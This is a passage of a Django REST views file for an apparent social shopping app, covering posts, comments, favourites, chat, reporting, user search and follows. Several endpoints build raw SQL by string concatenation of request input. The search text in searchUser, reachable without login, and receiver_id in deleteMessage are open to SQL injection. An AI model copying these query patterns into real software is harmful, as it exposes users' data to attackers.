post_serializer = PostSerializer(post)
data = post_serializer.data
user = User.objects.get(id=data['user'])
data['fullname'] = user.fullname
data['image'] = user.image
data['address'] = user.address
data['cartCount'] = cart
relpostsize = RelPostSize.objects.values(size_name=F('size__size'),sizeid = F('size__id')).filter(post_id = post.id)
# relpostsize = RelPostSize.objects.values(size='size__size',size1='size__id').filter(post_id = post.id)
# relpostsize = RelPostSize.objects.extra(select={'size_id':'size'}).values('size_id').filter(post_id = post.id)
relpostfabric = RelPostFabric.objects.values(fabric_name=F('fabric__fabric'),fabricid=F('fabric__id')).filter(post_id = post.id)
postimages = PostImage.objects.values('id','post_images').filter(post_id = post.id)
post_img_colour = PostImage.objects.values(colour_name=F('colour__colour_code'),colourid=F('colour__id')).filter(post_id = post.id)
# annotate(s=F('size__id'),s1=F('size__size'))
if post_like:
data['post_like'] = True
else:
data['post_like'] = False
if post_fav:
data['post_fav'] = True
else:
data['post_fav'] = False
if cart:
data['added_to_cart'] = True
else:
data['added_to_cart'] = False
temp = []
temp1 = []
temp2 = []
temp3 = []
for ele in postimages:
temp.append(ele)
data['post_image'] = temp
# for colour in post_img_colour:
# temp1.append(colour)
# data['post_image_colour'] = temp1
for size in relpostsize:
temp2.append(size)
data['size'] = temp2
for fabric in relpostfabric:
temp3.append(fabric)
data['fabric'] = temp3
return Response({"message":"post get successfully","data":data},status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================
# Api for delete post
#====================================
@AppVersion_required
@api_view(['POST'])
def deletePost(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
post_id = received_json_data['post_id']
user1 = User.objects.get(id =user.id)
post = Post.objects.get(id=post_id,post_status =1)
if post:
post1 = Post.objects.filter(id = post.id,user_id=user.id).update(post_status=0)
if post1:
post_count = user1.post_count
User.objects.filter(id = user.id).update(post_count = post_count-1)
return Response({"message" : deletePostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# Api for like and dislike post
# =====================================
# @csrf_exempt
# @api_view(['POST'])
# def LikedislikePost(request):
# try:
# with transaction.atomic():
# received_json_data = json.loads(request.body, strict=False)
# try:
# api_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=api_key)
# user = token1.user
# check_group = user.groups.filter(name='User').exists()
# if check_group == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# print(traceback.format_exc())
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# post_id = received_json_data['post']
# like_status = int(received_json_data['like_status'])
# post= Post.objects.get(id = post_id,post_status = 1)
# if like_status == 1:
# post_like = PostLike.objects.filter(user_id = user.id,post_id = post.id)
# if not post_like.exists():
# post_like = PostLike.objects.create(user_id = user.id,post_id = post.id)
# total_likes = post.total_likes
# Post.objects.filter(id = post.id).update(total_likes = total_likes+1)
# SendNotification(user.id,)
# return Response({"status": "1", 'message': PostLikedMessage},status=status.HTTP_200_OK)
# else:
# return Response({"message": "Post already liked", "status": "0"},
# status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# elif like_status==0:
# post_dislike = PostLike.objects.filter(user_id=user.id,post_id=post.id)
# if post_dislike.exists():
# post_dislike.delete()
# total_likes = post.total_likes
# Post.objects.filter(id = post.id).update(total_likes = total_likes-1)
# return Response({"status": "1", 'message': PostDislikedMessage},
# status=status.HTTP_200_OK)
# else:
# return Response({"message": "Already not liked ", "status": "0"},
# status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# else:
# return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# Api for favourite and unfavourite post
# =====================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def setFavPost(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
post_id = received_json_data['post_id']
fav_status = int(received_json_data['fav_status'])
post= Post.objects.get(id = post_id,post_status = 1)
if fav_status == 1:
post_fav = Favourite.objects.filter(user_id = user.id,post_id = post.id)
if not post_fav.exists():
post_fav = Favourite.objects.create(user_id = user.id,post_id = post.id)
return Response({"status": "1", 'message': setFavouriteMessage},status=status.HTTP_200_OK)
else:
return Response({"message": "already in favourite", "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
elif fav_status==0:
post_unfav = Favourite.objects.filter(user_id=user.id,post_id=post.id)
if post_unfav.exists():
post_unfav.delete()
return Response({"status": "1", 'message': setUnfavouriteMessage},
status=status.HTTP_200_OK)
else:
return Response({"message": "Already not favourite ", "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": "This post has been disabled by admin", "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : "This post has been disabled by admin", "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=============================================
# Api for get list of favourite posts
#=============================================
@AppVersion_required
@api_view(['GET'])
def getFavouritePost(request):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
user1 = User.objects.get(id = user.id)
page_num = request.GET.get('page_num')
favourite = Favourite.objects.select_related('user', 'post').filter(user_id = user.id,status=1)
# paginator = Paginator(favourite,5)
# try:
# favourite = paginator.page(page_num)
# except:
# favourite = None
if favourite:
favouriteserializer = FavouriteSerializer(favourite,many=True)
favouriteserializer_data = favouriteserializer.data
for data in favouriteserializer_data:
obj = User.objects.get(id=data['user'])
obj1 = Post.objects.get(id = data['post'])
price = obj1.price
postimages = PostImage.objects.values('post_images').filter(post_id = obj1)
data['post_description'] = obj1.post_description
data['total_likes'] = obj1.total_likes
data['total_comments'] = obj1.total_comments
data['price'] = str(price)
data['fullname'] = obj1.user.fullname
data['image'] = obj1.user.image
data['user'] = obj1.user.id
data['post_fav'] = True
data['created_time'] = obj1.created_time
data['post_type'] = obj1.post_type
temp = []
post_like = PostLike.objects.filter(user_id = user.id,post_id = data['post'])
if post_like:
data['post_like'] = True
else:
data['post_like'] = False
for d in postimages:
temp.append(d['post_images'])
data['post_image'] = temp
return Response({"data":favouriteserializer_data}, status=status.HTTP_200_OK)
else:
return Response({"data":[]}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# Api for add post comment
#======================================
@AppVersion_required
@api_view(['POST'])
def addPostComment(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
post_id = received_json_data['post_id']
post= Post.objects.get(id = post_id,post_status=1)
postComment = PostComment.objects.create(post_id = post.id,
user_id = user.id,
comment = received_json_data["comment"],
created_time = nowTime,
status = 1)
if postComment:
total_comments = post.total_comments
Post.objects.filter(id = post.id).update(total_comments = total_comments+1)
a = Post.objects.get(id = post_id)
post_comment_detail = {
"message":PostCommentMessage,
"id": postComment.id,
"user":postComment.user.id,
"fullname": postComment.user.fullname,
"image": postComment.user.image,
"post_id": postComment.post_id,
"comment": postComment.comment,
"created_time": postComment.created_time,
"total_comments": a.total_comments,
}
# a = (post.user)
# if a.onoffnotification == 1:
# notify = SendNotification(user.id,a.id,"notification",str(a.fullname) + "commented on your post","comment on post notification" ,str(post.id))
return Response(post_comment_detail, status=status.HTTP_200_OK)
else:
return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===================================
# Api for delete post comment
#====================================
@AppVersion_required
@api_view(['POST'])
def deletePostComment(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
comment_id = received_json_data['comment']
a = PostComment.objects.get(id = comment_id)
post = a.post_id
post = Post.objects.get(id = post)
postComment = PostComment.objects.filter(id=comment_id,user_id = user.id,status=1).exists()
if postComment:
PostComment.objects.filter(id = comment_id,user_id = user.id).update(status=0)
total_comments = post.total_comments
Post.objects.filter(id = post.id).update(total_comments = total_comments-1)
return Response({"message" : DeleteCommentMessage, "status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
# Api for get list of comments for a particular post
#====================================================
@AppVersion_required
@api_view(['GET'])
def GetPostComment(request,pk):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
post= Post.objects.get(pk=pk,post_status=1)
user1 = User.objects.get(id = user.id)
# page_num = request.GET['page_num']
postComment = PostComment.objects.filter(post_id = post.id,status=1).order_by('-created_time')
# paginator = Paginator(postComment, 10)
# try:
# postComment = paginator.page(page_num)
# except:
# postComment = None
if postComment:
postcommentserializer = PostCommentSerializer(postComment,many=True)
postcommentserializer_data = postcommentserializer.data
postcommentserializer_data.reverse()
for data in postcommentserializer_data:
obj = User.objects.get(id=data['user'])
data['fullname'] = obj.fullname
data['image'] = obj.image
return Response({"message" : "Comments fetched successfully","data":postcommentserializer_data}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Comments fetched successfully", "data":[]}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
# Api for send message
#=========================================
@AppVersion_required
@api_view(["POST"])
def sendMessage(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
tempS = datetime.datetime.utcnow().replace(tzinfo=utc)
# nowTime = datetime.datetime.strptime(str(timezone.now().date()) + " " + tempS, '%Y-%m-%d %H:%M:%S')
u = User.objects.get(id=user.id)
send = User.objects.get(id = u.id)
rec = User.objects.get(id = received_json_data["receiver_id"])
authuser = Message.objects.create(sender_id=u.id,
message = received_json_data["message"],
receiver_id = received_json_data["receiver_id"],
created_time =tempS)
data = {
"sender": u.id,
"receiver": authuser.receiver_id,
"message": authuser.message,
"is_read": authuser.is_read,
"sender_status": authuser.sender_status,
"receiver_status": authuser.receiver_status,
"created_time": authuser.created_time,
"image": u.image,
}
if authuser is not None:
try:
Token.objects.get(user_id = received_json_data["receiver_id"])
if rec.onoffnotification == 1:
notify = SendChatNotification(u.id, str(send.fullname), str(send.image), rec.id, str(rec.fullname) , str(rec.image), tempS, received_json_data["message"], str(send.fullname) + " has sent you a message")
return Response(data, status=status.HTTP_200_OK)
except:
return Response(data, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================================
#Api for get message
#===========================================
@AppVersion_required
@api_view(['POST'])
def getMessage(request): # chat one to one
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
user_id = received_json_data['id']
u1 = User.objects.get(id=user_id)
msg= Message.objects.filter(Q(sender_id=user.id) & Q(receiver_id=u1.id) & Q(sender_status= 1) | (Q(sender_id=u1.id) & Q(receiver_id=user.id) & Q(receiver_status= 1))).order_by('created_time')
authuser =Message.objects.filter(receiver_id=user.id, sender_id=user_id).update(is_read=1)
msgSerializer = MessageSerializer(msg,many=True)
msgs = msgSerializer.data
if msgs:
for data in msgs:
obj = User.objects.get(id = data['sender'])
obj1 = User.objects.get(id = data['receiver'])
data['image'] = obj.image
data['image1'] = obj1.image
return Response({"data":msgs}, status=status.HTTP_200_OK)
else:
return Response({"data":[], "message": "no data"}, status=status.HTTP_200_OK)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===============================================
#Api for get chat history
#===============================================
@AppVersion_required
@api_view(['GET'])
def chatHistory(request): # get latest messages
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
page_num = int(request.GET['page_num'])
maxRecords = 20
cursor = connection.cursor()
# condition = "select * from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
condition = "select *,date_format(created_time, '%Y-%m-%dT%T.000Z') as created_time from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
paginationCondition = " LIMIT "+ str((page_num - 1) * maxRecords) + "," + str(maxRecords) + " "
cursor.execute (condition + paginationCondition)
d = dictfetchall(cursor)
print("d", d)
cursor1 = connection.cursor()
cursor1.execute(condition)
d1 = dictfetchall(cursor1)
totalRecords= len(d1)
cursor.close()
totalPage = (totalRecords + maxRecords - 1) / maxRecords;
print(int(totalPage))
if d:
for data in d:
obj = User.objects.get(id = data['sender_id'])
obj1 = User.objects.get(id = data['receiver_id'])
data['sender_image'] = obj.image
data['receiver_image'] = obj1.image
data['sender_name'] = obj.fullname
data['receiver_name'] = obj1.fullname
if obj.id == user.id:
data['is_sent_by_me'] = True
else:
data['is_sent_by_me'] = False
return Response({"data":d ,"cart_count":user.cartNo, "total_pages": int(totalPage)}, status=status.HTTP_200_OK)
else:
return Response({"data":[],"cart_count":user.cartNo, "message": "no data"}, status=status.HTTP_200_OK)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================
#Api for delete message
#=========================================
@AppVersion_required
@api_view(["POST"])
def deleteMessage(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkUser = user.groups.filter(name='User').exists()
except:
return Response({'message' : "Session expired! Please login again", "status":"0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkUser is not None:
receiver_id = request.data["receiver_id"]
u = User.objects.get(id=user.id)
page_num = int(request.data['page_num'])
maxRecords = 20
cursor3 = connection.cursor()
condition = "select *,date_format(created_time, '%Y-%m-%dT%T.000Z') as created_time from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
paginationCondition = " LIMIT "+ str(((page_num - 1) * maxRecords)+19) + "," + str(1) + " "
cursor3.execute (condition + paginationCondition)
d = dictfetchall(cursor3)
cursor3.close()
if d== []:
last_ele=""
for i in d:
last_ele=i['id']
cursor = connection.cursor()
cursor.execute("update message SET sender_status = False where (sender_id=" + str(u.id) + " and receiver_id=" + str(receiver_id) + ")")
cursor.execute("update message SET receiver_status = False where (receiver_id = " + str(u.id) + " and sender_id = " + str(receiver_id) + ")")
cursor.close()
cursor2 = connection.cursor()
condition = "select *,date_format(created_time, '%Y-%m-%dT%T.000Z') as created_time from message where((sender_id =" +str(user.id) + " and sender_status = 1) or (receiver_id = " +str(user.id) + " and receiver_status = 1)) and id in (select max(id) from message group by if(sender_id = " + str(user.id) + ", concat(sender_id,'',receiver_id), concat(receiver_id,'',sender_id)))order by created_time desc"
paginationCondition = " LIMIT "+ str(((page_num - 1) * maxRecords)+19) + "," + str(1) + " "
cursor2.execute (condition + paginationCondition)
d = dictfetchall(cursor2)
cursor1 = connection.cursor()
cursor1.execute(condition)
d1 = dictfetchall(cursor1)
totalRecords= len(d1)
cursor2.close()
totalPage = (totalRecords + maxRecords - 1) / maxRecords;
if d:
for data in d:
obj = User.objects.get(id = data['sender_id'])
obj1 = User.objects.get(id = data['receiver_id'])
data['sender_image'] = obj.image
data['receiver_image'] = obj1.image
data['sender_name'] = obj.fullname
data['receiver_name'] = obj1.fullname
if obj.id == user.id:
data['is_sent_by_me'] = True
else:
data['is_sent_by_me'] = False
if last_ele=="":
return Response({"message": "delete successfully", "status":"1","data":d ,"cart_count":user.cartNo,"total_pages": int(totalPage)}, status=status.HTTP_200_OK)
else:
return Response({"message": "delete successfully", "status":"1","data":d ,"cart_count":user.cartNo,"deleted_message":last_ele, "total_pages": int(totalPage)}, status=status.HTTP_200_OK)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=======================================
#Api for report post by user
#=======================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def report_post(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
post_id = received_json_data['post_id']
post1 = Post.objects.get(id = post_id,post_status=1)
report1 = ReportPost.objects.filter(user_id = user.id, post_id = post1)
if report1:
return Response({"message":"You have already reported for this post","status":"1"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
if received_json_data['reason'] == "Unauthorized Sales":
report = ReportPost.objects.create(user_id = user.id,
post_id = post1.id,
reason = "Unauthorized Sales",
status = 1)
elif received_json_data['reason'] == "Inappropriate content":
report = ReportPost.objects.create(user_id = user.id,
post_id = post1.id,
reason = "Inappropriate content",
status = 1)
elif received_json_data['reason'] == "Threatening or violent":
report = ReportPost.objects.create(user_id = user.id,
post_id = post1.id,
reason = "Threatening or violent",
status = 1)
else:
report = ReportPost.objects.create(user_id = user.id,
post_id = post1.id,
reason = received_json_data['reason'],
status = 1)
return Response({"message":"successfully reported","status":"1"},status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : "This post has been disabled by admin", "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# #==============================================
# # get user profile
# #==============================================
# @AppVersion_required
# @csrf_exempt
# @api_view(['GET'])
# def Myprofile(request):
# try:
# with transaction.atomic():
# # received_json_data = json.loads(request.body, strict=False)
# try:
# api_key = request.META.get('HTTP_AUTHORIZATION')
# token1 = Token.objects.get(key=api_key)
# user = token1.user
# check_group = user.groups.filter(name='User').exists()
# if check_group == False:
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# except:
# print(traceback.format_exc())
# return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
# serializer = UserSerializer(user).data
# posts = Post.objects.filter(user_id=user.id,post_status=1)
# post1 = PostImage.objects.values('post_images').filter(post_id__in = posts)
# temp = []
# for p in post1:
# temp.append(p['post_images'])
# serializer['post_image'] = temp
# return Response({"response":serializer},status=status.HTTP_200_OK)
# except Exception:
# print(traceback.format_exc())
# return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
# Get user profile
#==============================================
@AppVersion_required
@csrf_exempt
@api_view(['GET'])
def Userprofile(request,pk):
try:
with transaction.atomic():
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
user1 = User.objects.get(pk=pk)
serializer = UserSerializer(user1).data
follow = FollowUser.objects.filter(follow_by_id = user.id, follow_to_id = user1.id)
posts = Post.objects.filter(user_id=user.id,post_status=1)
# post1 = PostImage.objects.values('post','post_images').filter(post_id__in = posts).annotate(Count('post'), Count('post_image')).order_by('created_time')
cursor = connection.cursor()
cursor.execute("select post_id as post,post_images as post_image from postimage pi inner join post p on p.id = pi.post_id and p.user_id=" + str(user1.id) + " and post_status = 1 group by p.id order by p.created_time desc ")
d = dictfetchall(cursor)
cursor.close()
temp = []
temp1 = []
for p in d:
temp.append(p)
serializer['post_images']= temp
if follow:
temp1.append(follow)
serializer["follow_status"] = True
else:
serializer["follow_status"] = False
serializer['user_id'] = user.id
return Response({"data":serializer },status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#============================================================
# Search user by username or fullname
#===========================================================
def dictfetchall(cursor):
"Return all rows from a cursor as a dict"
columns = [col[0] for col in cursor.description]
return [
dict(zip(columns, row))
for row in cursor.fetchall()
]
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def searchUser(request):
try:
with transaction.atomic():
if request.META.get('HTTP_AUTHORIZATION') == None:
received_json_data = json.loads(request.body, strict=False)
page_num = int(request.GET['page_num'])
maxRecords = 20
searchText = received_json_data['searchText']
searchText = searchText.replace("_", "\_")
if searchText:
cursor = connection.cursor()
condition = "select id,fullname, user_name, image from auth_user where is_pro_created = True and (fullname like '%" + str(searchText) + "%' or user_name like '%" + str(searchText) + "%') and id in (select user_id as id from auth_user_groups where group_id != 2)"
paginationCondition = " LIMIT "+ str((page_num - 1) * maxRecords) + "," + str(maxRecords) + " "
cursor.execute (condition + paginationCondition)
d = dictfetchall(cursor)
cursor.close()
cursor1 = connection.cursor()
cursor1.execute(condition)
d1 = dictfetchall(cursor1)
totalRecords= len(d1)
cursor.close()
totalPage = (totalRecords + maxRecords - 1) / maxRecords;
return Response({"status": "1", 'message': 'Get successfully','data':d, "total_pages": int(totalPage)},status=status.HTTP_200_OK)
else:
# maxRecords = 10
cursor = connection.cursor()
condition = "select id,fullname, user_name, image from auth_user where is_pro_created = True and (fullname != '' and user_name != '') and id in (select user_id as id from auth_user_groups where group_id != 2) order by fullname asc"
paginationCondition = " LIMIT "+ str((page_num - 1) * maxRecords) + "," + str(maxRecords) + " "
cursor.execute (condition + paginationCondition)
d = dictfetchall(cursor)
cursor.close()
cursor1 = connection.cursor()
cursor1.execute(condition)
d1 = dictfetchall(cursor1)
totalRecords= len(d1)
cursor.close()
totalPage = (totalRecords + maxRecords - 1) / maxRecords;
return Response({'message': 'Get successfully', 'data':d, "total_pages": int(totalPage)},status=status.HTTP_200_OK)
else:
try:
received_json_data = json.loads(request.body, strict=False)
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
page_num = int(request.GET['page_num'])
maxRecords = 20
searchText = received_json_data['searchText']
searchText = searchText.replace("_", "\_")
if searchText:
cursor = connection.cursor()
condition = "select id,fullname, user_name, image from auth_user where (id != " +str(user.id) + ") and (is_pro_created = True) and (fullname like '%" + str(searchText) + "%' or user_name like '%" + str(searchText) + "%') and id in (select user_id as id from auth_user_groups where group_id != 2)"
paginationCondition = " LIMIT "+ str((page_num - 1) * maxRecords) + "," + str(maxRecords) + " "
cursor.execute (condition + paginationCondition)
d = dictfetchall(cursor)
cursor.close()
cursor1 = connection.cursor()
cursor1.execute(condition)
d1 = dictfetchall(cursor1)
totalRecords= len(d1)
cursor.close()
totalPage = (totalRecords + maxRecords - 1) / maxRecords;
return Response({"status": "1", 'message': 'Get successfully','data':d, "total_pages": int(totalPage)},status=status.HTTP_200_OK)
else:
# maxRecords = 10
cursor = connection.cursor()
condition = "select id,fullname, user_name, image from auth_user where (id != " +str(user.id) + ") and (is_pro_created = True) and (fullname != '' and user_name != '') and id in (select user_id as id from auth_user_groups where group_id != 2) order by fullname asc"
paginationCondition = " LIMIT "+ str((page_num - 1) * maxRecords) + "," + str(maxRecords) + " "
cursor.execute (condition + paginationCondition)
d = dictfetchall(cursor)
cursor.close()
cursor1 = connection.cursor()
cursor1.execute(condition)
d1 = dictfetchall(cursor1)
totalRecords= len(d1)
cursor.close()
totalPage = (totalRecords + maxRecords - 1) / maxRecords;
return Response({'message': 'Get successfully', 'data':d, "total_pages": int(totalPage)},status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#========================================================
#Set User Folllower and following
# =======================================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def setFollow(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
